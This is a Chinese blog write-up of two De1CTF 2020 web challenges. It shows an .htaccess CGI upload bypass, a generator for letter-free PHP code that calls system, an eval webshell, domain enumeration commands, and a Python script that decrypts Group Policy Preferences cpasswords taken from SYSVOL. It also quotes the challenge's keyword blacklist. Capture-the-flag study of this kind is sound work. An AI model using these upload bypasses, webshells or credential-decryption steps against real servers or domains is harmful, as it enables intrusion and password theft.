De1ta 2020 部分WP

最新推荐文章于 2021-04-24 10:41:44 发布
最新推荐文章于 2021-04-24 10:41:44 发布
阅读量751 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40648358/article/details/107578239
版权

web

check in

  • 打开题目后,发现是一个文件上传的题目

  • 随便传个马,发现过滤了perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!

  • 于是想到了利用cgi执行脚本

  • 先上传一个.htaccess文件,内容是:

AddHandler cgi-script .png
  • 然后上传一个后缀为png的文件,内容是
#! /bin/bash
echo "Content-Type: text/html"
echo
echo "rdd" # 满足格式要求,同时注意windows下和linux下文件的差别
cat /flag
  • 访问文件获得flag

Hard_Pentest_1

  • 打开题目,给出了源码:
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="submit">
</form>

</body>
</html>

  • 规定了不能是php的后缀,可以使用Php,PHp等大小写单词进行绕过

  • 正则preg_match('/[a-z0-9;~^`&|]/is',$file_content)限制了上传的文件中不能有大小写字母,数字和字符;~^&|

  • 可以使用短标签,写入文件,一次进行解析

  • 参考P神的文章,链接

  • 编写一个批量生成的脚本

# By:江鸟@星盟
str1 = 'system'
print "<?=$_=[]?><?=$_=@\"$_\"?><?=$_=$_['!'=='@']?>"
for j in str1:
    # print j
    print '<?=$__=$_?>'
    for i in range(1,ord(j)-96):
        print ('<?=$__++?>')
    print '<?=$___.=$__?>'

print('''<?=$____='_'?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$_=$$____?>
<?=$___($_[_])?>''')

  • 传一个能执行system的马上去,然后通过POST传参数_执行命令

  • 这里为了方便,就再写一个马,方便蚁剑直接连接:_=echo ^<?php @eval($_POST['x']);?^> > shell.php

  • 蚁剑连接as_file.png

  • 查看一下根目录和其他目录,发现没有flag,可能是需要域渗透

  • 可以查看别人的目录,但是权限依然很低

  • 使用命令for /r c:\ %i in (*flag*) do @echo %i,查询所有带flag的文件

  • 找到一个目录下有个flag1_and_flag2hint.zip文件,应该是我们要找的文件,可能是谁做的忘删了(上车.jpg

  • 复现时发现直接在R:\下就有了,ORZZZZZ,(眼瞎.jpg

  • 执行命令ipconfig /all;netstat -na;net user /domain;Systeminfo等一些命令,进行信息收集

  • 得出一下几点结论:

本机IP192.168.0.11

内网存在主机192.168.0.12

whoami:de1ctf2020\web

net user /domain :Administrator De1ta Guest HintZip_Pass krbtgt web

  • 值得注意的点HintZip_Pass

  • 尝试一下GPP

  • 利用dir /s /a \\192.168.0.12\SYSVOL\*.xml

  • 发现了Groups.xml

  • 尝试读取type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml

  • 内容:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}">
<Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/>
</User>
</Groups>
  • 泄露了信息cpassword,直接脚本
#!/usr/bin/python2
import sys
from Crypto.Cipher import AES
from base64 import b64decode

if(len(sys.argv) != 2):
  print "decrypt.py <cpassword>"
  sys.exit(0)

key = """4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b""".decode('hex')
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
out = AES.new(key, AES.MODE_CBC, "\x00" * 16)
out = out.decrypt(password)
print out[:-ord(out[-1])].decode('utf16')

  • 解出密码zL1PpP@sSwO3d

  • 密码解压压缩包,获得flag以及hint

flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.
「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
De1ctf 2020 -'check in' writeup
汗的博客
05-06 1386
这道题很有意思,考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过 文件内容过滤了很多字符 perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents! 传jpg格式的shell <?=eval($_POST[123]); 传.htaccess文件,burp...
De1ctf 2020 -'Misc杂烩' writeup
汗的博客
05-06 789
一道很有意思的流量分析+NTFS隐写 文章目录描述文件地址hintwriteup 描述 文件地址 https://drive.google.com/file/d/1-SrQ8JbD8zAQNVlvuwu3T2Lbu_o1knRQ/view?usp=sharing hint writeup 下载文件,wireshark打开,看了下有很多post请求,文件-导出对象-http 然后会导出一堆文件,...
重做De1CTF2020的Flw
Zarcs_233的博客
04-24 239
初识虚拟机 当时第一次做这个题目的时候不懂这个奇怪的虚拟机,现在重新捞出来重做了一遍 首先使用普通的IDA7.5 x32会打不开,卡在打开的界面,具体原因可能是某个花指令导致的让IDA控制流分析的时候爆炸?。可以先使用IDA7.5 x64查看下汇编代码,尝试Patch掉一些不正常的代码。 首先是main函数下的经典假跳转,然后就是跳转到指令内部的花指令 发现这个跳转有说法,其实就是内部有inc和dec两个指令构成,非常的巧妙 所以直接Patch掉这一整句jmp指令即可 修复所有这样的花指令之后发现还是无法
De1CTF2020--WEB--check in
a965527596的博客
06-24 475
check in 第一步 打开题目上传一句话,发现有后缀检测和MIME类型检测,不能 上传php文件,而且有内容检测,内容中不能出现下列字符,尝试上传.htaccess。 第二步 因为检测内容中不能出现php,所以使用换行拼接。上传内容为 接下来上传一句话,同理不能出现php,利用短标签来绕过,从PHP5.4.0起<?=和<?php是一样的 使用蚁...
De1CTF2020的Web部分题解
蚁景网安学院
05-08 1493
前言题目质量很好,虽然很难但是学到不少东西!0x01 check in打开题目页面如下:题目是一个文件上传挑战,于是先上传一个.php后缀的文件先式式,不出意料失败,那么我们就上传一张....
De1CTF2020:De1CTF2020
02-18
压缩包中的文件名“De1CTF2020-master”可能意味着这是整个比赛资源的主分支或核心部分。在实际的CTF比赛中,这类文件通常包含了比赛题目、源代码、数据集、解题提示或者解决方案。参赛者需要仔细研究这些文件,理解...
De1ctf 2020 -‘check in’ writeup
01-09
在CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
具有执行器故障的不确定De1ta算子系统鲁棒H∞控制 (2001年)
05-20
利用H∞控制方法,讨论了含有时变参数不确定性和执行器故防障的De1ta算子系统鲁棒可靠性控制问题。通过将故摩执行器输入视为能量有界的干扰信号,并利用H∞范数与Riccad代数矩阵不等式的关系,把系统鲁棒可靠性控制...
DE1-soc 内部资料
03-10
3. `Schematic`:这个文件或文件夹通常包含DE1-SOC的电路原理图,用户可以通过查看这些图纸理解开发板的硬件结构,如FPGA与外部组件的连接方式,以及各部分的功能。 4. `Tools`:此目录可能包含与DE1-SOC相关的软件...
史上最全DE1-SOC部分引脚分配表
10-10
"史上最全DE1-SOC部分引脚分配表"是一个重要的参考资料,它详细列出了DE1-SOC开发板上各个外设与FPGA芯片引脚的对应关系,便于用户在设计项目时正确连接和配置硬件。 首先,我们来了解一下DE1-SOC开发板上的主要...
[De1CTF 2019]9calc 这道题暂时还没搞明白,暂时做个记录~~
a3320315的博客
02-10 1074
参考链接 飘零师傅 梅子酒师傅 cacl_famliy
de1ctf_2019_unprintable(_dl_fini的l_addr劫持妙用)
seaaseesa的博客
06-12 1435
de1ctf_2019_unprintable(_dl_fini的l_addr劫持妙用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,存在一个非栈上的格式化字符串漏洞,但是关闭了文件描述符1,导致不能输出,并且printf结束后就调用了exit(0) 看看栈里有没有什么可用的数据 基本没有,要想劫持printf返回地址进而多次利用,是不行的,因为printf一次性不能实现,即不能修改栈中数据指向printf返回地址后继续利用新得到这个地址取修改printf返回地址,即其不具
GKCTF web-CheckIN 解题思路writeup
qq_41743240的博客
05-24 1027
打开题目可以看到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin
CTF|check writeup
skyattractive的博客
06-20 603
CTF|check writeup 总体思路是想让你输入一串字符 输入的字符要使在400f51函数返回值为true 则到pwn环节 函数里面条件要求几个变量等于某些值 一开始的想法是 这些变量都在bss段 想试试能不能往bss写入它要求的值 然后发现gbd也没办法调试 然后我就开始看 给出函数的内容 … 我是从下往上看 条件中需要602060处值为90 所以v2应该等于25 因为这样对应v38 = 90 以此类推 v2=25;v3=23;v4=25;v5=37 希望通过这些值反推回去 然后看到
看雪2020CTF 守株待兔
JackBoy的博客
05-29 363
根据这句话,可以求分解曲线阶的最小公倍数即为整个曲线的阶 #n=37975227936943673922808872755445627854565536638199 * 40094690950920881030683735292761468389214899724061 #curve 1 M = 40094690950920881030683735292761468389214899724061 A = 0 B = 0x68ef17c5878742e629b88277f8b712506f89996..
CTF-WEB总结之SSRF利用
weixin_41038905的博客
05-01 2496
1、dirsearch目录扫描 看不到内容是由于php的<被当做一个注释。php的格式 <?php ... ?> 通过dict协议探测端口
攻防世界 gametime
Bsecure的博客
05-02 965
gametime 首先查壳, 发现无壳. 打开程序看一下. 果然是一个游戏, 简单的看了一下, 是让我们在规定时间输入屏幕上显示的字符. ida打开, 看伪代码, 很冗长, 向下浏览一下可以看见好几个判断函数. 且都是一个函数, 程序肯定不应该是退出. 我们的目的就是让它的返回值为 非0 进入 sub_401507 看看. 发现还有个判断的地方, 我们的目的: 让它返回...
De1CTF2020-Misc Easy Protocol
Renekt0n
05-04 1264
题目文件链接:easy-protocol 文件列表: 使用file命令查看hint文件 发现文件格式为cab文件,文件中包含一个名为hint.txt的文件,提取出hint文件查看内容 提示文件给出了flag的格式与提示,猜测三个数据包对应flag的三段。接下来使用wireshark依次打开三个数据包文件,一脸懵逼。 仔细查看part3文件,返现存在HTTP协议的数据包,过滤HTTP的包 从数据...
1t98cp.com main.php,SCTF2019 Writeup——De1ta
weixin_39962125的博客
03-18 6932
前排广告位De1ta长期招Web/逆向/pwn/密码学/硬件/取证/杂项/etc.选手有意向的大佬请联系ZGUxdGFAcHJvdG9ubWFpbC5jb20=De1ta是一个充满活力的CTF团队,成立至今的一年里,我们在不断变强,也在不断完善内部的制度,使得De1ta的每一位成员都能在技术和热情上保持提升,欢迎各位师傅的加入,尤其欢迎CTF新起之秀的加入。Misc关注公众号,cat /flag...
DE1-SoC开发板用户手册
通过块图,用户可以理解DE1-SoC板的主要组成部分,为后续的硬件接口操作提供参考。 第三章详细讨论了如何使用DE1-SoC板。首先,介绍了FPGA配置模式的设置,这对于加载和运行FPGA设计至关重要。接着,描述了如何配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值